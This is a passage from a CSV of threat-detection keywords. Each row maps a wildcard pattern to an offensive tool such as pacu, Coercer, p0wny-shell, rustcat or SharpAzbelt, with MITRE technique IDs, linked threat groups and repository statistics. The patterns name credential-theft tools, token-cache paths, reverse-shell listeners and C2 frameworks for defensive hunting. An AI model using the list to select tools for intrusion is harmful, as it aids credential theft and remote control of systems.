penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*OverrideLHOST 360.com*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*owa */autodiscover/autodiscover.xml* --recon*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*OWASP*Amass*","offensive_tool_keyword","amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","N/A","Information Gathering","https://github.com/caffix/amass","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*OwnerPersist-POST.*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Ox-Bruter.pl*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","1","N/A","7","10","N/A","N/A","N/A","N/A" +"*-p 5000:5000 pador_vuln_server*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" +"*P0cL4bs*","offensive_tool_keyword","Github Username","github repo name hosting lots of exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/P0cL4bs","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
+"*p0dalirius/Coercer*","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","6","536","53","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" +"*p0dalirius/Coercer*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*p0dalirius/ExtractBitlockerKeys*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" +"*p0dalirius/LDAPWordlistHarvester*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","221","14","2023-10-04T19:01:55Z","2023-09-22T10:10:10Z" +"*p0dalirius/pyLAPS*","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential 
Access","https://github.com/p0dalirius/pyLAPS","1","1","N/A","9","1","50","9","2023-10-01T19:17:01Z","2021-10-05T18:35:21Z" +"*p0f -i eth* -p*","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*p0f/p0f.fp*","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*p0wnedShell*","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","10","1488","363","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z" +"*p0wny-shell*","offensive_tool_keyword","p0wny-shell","p0wny@shell:~# is a very basic. single-file. PHP shell. 
It can be used to quickly execute commands on a server when pentesting a PHP application. Use it with caution: this script represents a security risk for the server.","T1059 - T1027 - T1053 - T1035 - T1105","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/flozz/p0wny-shell","1","1","N/A","N/A","10","1579","620","2023-08-10T15:54:47Z","2016-11-09T20:41:01Z" +"*p3nt4/Nuages*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*P4wnP1*","offensive_tool_keyword","P4wnP1","P4wnP1 is a highly customizable USB attack platform. based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W (required for HID backdoor).","T1200 - T1056.001 - T1059.003 - T1547.001","TA0002 - TA0003 - TA0004","N/A","N/A","Network Exploitation tools","https://github.com/RoganDawes/P4wnP1","1","1","N/A","N/A","10","3768","667","2019-10-31T12:30:16Z","2017-02-22T14:34:09Z" +"*P8CuaPrgwBjunvZxJcgq*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*pack_py_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*package externc2*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*package_cvs_into_lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*package=impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*PackMyPayload.py*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","729","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" +"*PackMyPayload-master*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","729","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" +"*pacman -S rustcat*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*pacu --exec *","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - 
TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu --list-modules*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu --module-args=*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu --module-info*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu --module-name *","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu --session *","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu --set-regions 
*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu --whoami*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu/core pacu*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu/last_update.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu-master.zip*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*padekgcemlokbadohgkifijomclgjgif*","greyware_tool_keyword","Proxy SwitchyOmega","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data 
Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*padlock2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*padre -u *http*://*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" +"*padre-master.zip*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","1","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" +"*papacat -l -p *","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","260","25","2023-03-30T06:22:24Z","2021-05-11T06:26:10Z" +"*ParamPamPam*","offensive_tool_keyword","ParamPamPam","This tool is used for brute discover GET and POST parameters.","T1110 - T1210 - T1211","TA0001 - TA0002 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Bo0oM/ParamPamPam","1","1","N/A","N/A","3","244","60","2022-06-27T11:45:19Z","2018-11-10T08:38:30Z" +"*parrot*security.vdi*","offensive_tool_keyword","parrot os","Parrot OS is a 
Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*parrotsec.org/download/*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Parrot-security-*.iso*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*parse_aggressor_properties*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*parse_nessus_file*","offensive_tool_keyword","crackmapexec","function name from nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*parse_nmap_xml*","offensive_tool_keyword","crackmapexec","function name from nmap.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*parse_shellcode*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z" +"*ParseMSALCache*.azure\msal_token_cache.bin*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" +"*ParseMSALCache*Appdata\Local\.IdentityService\msal.cache*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. 
It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" +"*parser.exe -a *.dmp*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z" +"*parser.exe -a *.dmp*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z" +"*PassDetective extract*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","7","1","52","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" +"*PassDetective-main.*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","7","1","52","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" +"*passhunt.exe*","offensive_tool_keyword","PassHunt","PassHunt searches drives for documents that contain passwords or any other 
regular expression. Its designed to be a simple. standalone tool that can be run from a USB stick.","T1081 - T1083 - T1003 - T1039 - T1213","TA0003 - TA0010","N/A","N/A","Information Gathering","https://github.com/Dionach/PassHunt","1","1","N/A","N/A","1","60","36","2014-07-11T09:08:02Z","2014-07-11T08:46:20Z" +"*passhunt.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*passhunt.py*","offensive_tool_keyword","PassHunt","PassHunt searches drives for documents that contain passwords or any other regular expression. Its designed to be a simple. standalone tool that can be run from a USB stick.","T1081 - T1083 - T1003 - T1039 - T1213","TA0003 - TA0010","N/A","N/A","Information Gathering","https://github.com/Dionach/PassHunt","1","1","N/A","N/A","1","60","36","2014-07-11T09:08:02Z","2014-07-11T08:46:20Z" +"*passivex.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*passivex.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*passphrase-rule1.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*passphrase-rule2.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" 